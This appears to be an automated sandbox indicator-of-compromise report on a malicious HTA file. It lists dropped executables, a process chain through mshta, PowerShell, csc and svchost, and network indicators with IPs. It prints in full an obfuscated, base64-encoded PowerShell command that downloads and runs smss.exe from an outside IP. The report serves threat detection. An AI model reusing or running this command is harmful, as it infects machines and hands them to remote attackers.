IOC Report
givemebestthingsforgivemebest.hta

givemebestthingsforgivemebest.hta

HTML document, ASCII text, with very long lines (13756), with CRLF line terminators

initial sample

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\smss[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.cmdline

Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.dll

PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Roaming\smss.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Windows\SysWOW64\mshta.exe

mshta.exe "C:\Users\user\Desktop\givemebestthingsforgivemebest.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y35p2qjs\y35p2qjs.cmdline"

C:\Users\user\AppData\Roaming\smss.exe

"C:\Users\user\AppData\Roaming\smss.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\user\AppData\Roaming\smss.exe"

C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe

"C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\vfGnBwOXnux.exe"

C:\Windows\SysWOW64\AtBroker.exe

"C:\Windows\SysWOW64\AtBroker.exe"

C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe

"C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\nJgyF7kA.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\Firefox.exe"

http://www.855696a.xyz/q86a/

45.119.52.125

http://172.245.123.32/70/smss.exe

172.245.123.32

http://www.soportemx-findmy.click/ma0g/

198.58.118.167

http://www.worrr37.yachts/1imc/

149.104.1.185

http://www.worrr37.yachts/1imc/?DjqdfNk=GkZ+7lZN5ZbT6rZBuZ+pskfJL+6uT56R2eAXidPe90Y9rybDHdv8GRqVb6FfMfkpXSVDgNv2zaXT/X0CpEMHhd+DXQfhkENwgiz5+jrub82ItCLB/EMlgTjPlwiCI2nY+w==&fNeX=nNpDjLP

149.104.1.185

http://172.245.123.32/70/smss.exewC:

unknown

http://www.blackhat.chat/04r3/

52.223.13.41

http://172.245.123.32/70/smss.exe0

unknown

http://www.soportemx-findmy.click/ma0g/?DjqdfNk=H2S90RmziCMvLCuL5yTkJF203ndQbU/T+UjWuF5QkK5TSoHa4lhKP7xjBIvwYHsxlglzK0GWG6GIcHietPpqi+1gs/5BxCzY4CtYzWb39E9UovJPnlwKJarvBRzz8eyTcw==&fNeX=nNpDjLP

198.58.118.167

http://www.thykingdomwear.store/d4kl/?DjqdfNk=6y/7tod/VF/KHUQqfM/wfVXibkdmZeeslXhDnWhvAY/z/yk3pdRRAQekYBjFWPUzPUKr4nIOcHvctiu99XDhEDhTzejKR0AKl6+T/G5w3q1KIwX/LqFItooehhCIycehmA==&fNeX=nNpDjLP

75.2.103.23

ns195.l4y.cn

45.119.52.125

www.vczuahand.xyz

76.223.54.146

www.soportemx-findmy.click

198.58.118.167

www.855696a.xyz

unknown

76.223.54.146

www.vczuahand.xyz

United States

45.119.52.125

ns195.l4y.cn

China

172.245.123.32

unknown

United States

198.58.118.167

www.soportemx-findmy.click

United States